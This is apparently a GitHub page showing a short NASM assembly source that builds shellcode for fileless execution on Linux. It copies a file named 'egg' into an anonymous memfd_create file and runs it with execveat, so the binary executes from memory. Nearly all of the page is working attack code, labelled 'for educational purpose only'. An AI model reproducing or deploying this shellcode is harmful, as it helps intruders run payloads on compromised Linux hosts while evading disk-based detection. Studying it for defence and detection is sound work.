memexec/memexec.nasm at main · hardenedlinux/memexec · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
; This code was used to generate the ShellCode. You wont
; need it again. Published for educational purpose only.
; https://www.thc.org
;
; nasm -felf64 memexec.nasm && ld memexec.o &&  ./a.out

global _start
section .text

_start:
    push    0x00676765  ; "egg"
    mov     rax, 0x13f
    mov     rdi, rsp    ; arg 1: name [egg]
    xor     rsi, rsi    ; arg 2: 0 = no MFD_CLOEXEC
    syscall
    mov     r8, rax

    mov     rax, 2
    mov     rdi, rsp    ; arg 1: name [egg]
    xor     rsi, rsi    ; arg 2: 0 = O_RDONLY
    syscall
    mov     r9, rax

loop:
    sub     rsp, 0x400
    xor     rax, rax    ; arg 0: read_NR
    mov     rdi, r9     ; arg 1: FD [egg]
    mov     rsi, rsp    ; arg 2: buffer
    mov     edx, 0x400  ; arg 3: length
    syscall

    cmp     rax, 0x00
    jle     done        ; EOF

    mov     rdx, rax    ; arg 3: length (from read())
    mov     eax, 0x01   ; arg 0: write_NR
    mov     rdi, r8     ; arg 1: FD [memfd]
    syscall
    jmp     loop
done:

    mov     rax, 322    ; arg 0: execveat_NR
    mov     rdi, r8     ; arg 1: memfd
    push    0x00        ; an empty string
    mov     rsi, rsp    ; arg 2: path (empty string)
    mov     rdx, rsp    ; arg 3: ARGV points to empty string
    xor     rcx, rcx    ; arg 4: ENV
    mov     r8, 0x1000  ; arg 5: AT_EMPTY_PATH
    xor     r9, r9      ; arg 6: must be clean
    xor     r10, r10    ; arg 7: must be clean
    syscall

    mov     rax, 60
    xor     rdi, rdi
    syscall